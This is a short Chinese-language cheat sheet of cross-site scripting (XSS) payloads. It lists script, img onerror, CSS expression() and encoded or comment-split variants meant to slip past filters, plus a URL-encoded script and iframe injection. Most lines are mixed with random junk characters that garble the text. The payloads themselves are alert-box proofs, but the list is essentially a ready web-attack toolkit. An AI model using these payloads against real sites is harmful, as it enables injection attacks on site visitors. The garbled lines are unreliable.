<script>alert("跨站")</script> (最常用)
1 q3 l2 o7 R. ~1 R6 r' I( b) {<img scr=javascript:alert("跨站")></img>! m& u8 p/ D, f$ P5 v
<img scr="javascript: alert(/跨站/)></img>
Q- f& U5 b# }+ c+ Z<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)4 C. v0 L2 q* a- U: ^2 y9 h
<img scr="#" onerror=alert(/跨站/)></img>
0 |! p5 N' W6 Z8 y) U9 }# I<img scr="#" style="xss:expression(alert(/xss/));"></img>
9 p8 [: G: }' y; j4 W$ v<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释). o9 A5 S# ?: ]$ z
<img src=vbscript:msgbox ("xss")></img>
! _: Z" z. [) \3 }: o. s<style> input {left:expression (alert('xss'))}</style>! n: `$ Y2 j: c3 k
<div style={left:expression (alert('xss'))}></div>
. r$ m" o8 l* ~$ ?0 L; j( z<div style={left:exp/* */ression (alert('xss'))}></div>
& @0 x+ `+ G8 m( P. H<div style={left:\0065\0078ression (alert('xss'))}></div>
- S8 Q0 I" n0 c/ A* }html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
$ k' k% f) z& s: U5 ~unicode <div style="{left:expRessioN (alert('xss'))}">% O$ ^8 A$ x# |
/ S% j Q/ L9 D4 c0 N! F"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["0 z# I& Q+ A% S! c9 l
|